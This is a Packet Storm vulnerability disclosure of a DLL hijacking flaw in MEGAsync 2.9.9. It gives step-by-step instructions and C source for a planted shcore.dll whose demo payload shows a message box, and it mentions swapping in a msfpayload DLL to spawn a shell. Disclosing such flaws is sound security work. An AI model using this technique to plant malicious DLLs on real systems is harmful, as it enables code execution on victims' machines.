MEGAsync 2.9.9 DLL Hijacking

2016-08-29T00:00:00
ID PACKETSTORM:138543
Type packetstorm
Reporter Amir.ght
Modified 2016-08-29T00:00:00

Description

                                        
                                            `# Exploit Title: MEGAsync DLL Hijacking Exploit (shcore.dll)  
# Date: 27-8-2016  
# Author: Amir.ght  
# Vendor Homepage: https://mega.nz  
# Software Link:  
https://mega.nz/MEGAsyncSetup.exe  
# Version: 2.9.9  
# Tested on:Windows 7  
----------------------------------------------------------------------------------------------------------  
Vuln DLL: shcore.dll  
  
MEGAsync.exe will search for an load any DLL named "shcore.dll".  
If an attacker can place the DLL in a location  
where victim open MEGAsync.exe it will load and run the attackers DLL  
and code.  
also can generate a msfpayload DLL and spawn a shell, for example.  
  
----------------------------------------------------------------------------------------------------------  
# Exploit:   
1- Save and compile below C code as 'shcore.dll' to create vuln DLL  
  
2- Place 'shcore.dll' on Same Directory of MEGAsync  
  
3- Open MEGAsync.exe :DLL  
  
//gcc test.c -o shcore.dll -shared  
//this dll show a message box   
#include <windows.h>  
#define DllExport __declspec (dllexport)  
  
BOOL WINAPI DllMain (  
HANDLE hinstDLL,  
DWORD fdwReason,  
LPVOID lpvReserved)  
{  
dll_hijack();  
return 0;  
}  
  
int dll_hijack()  
{  
MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);  
return 0;  
}  
`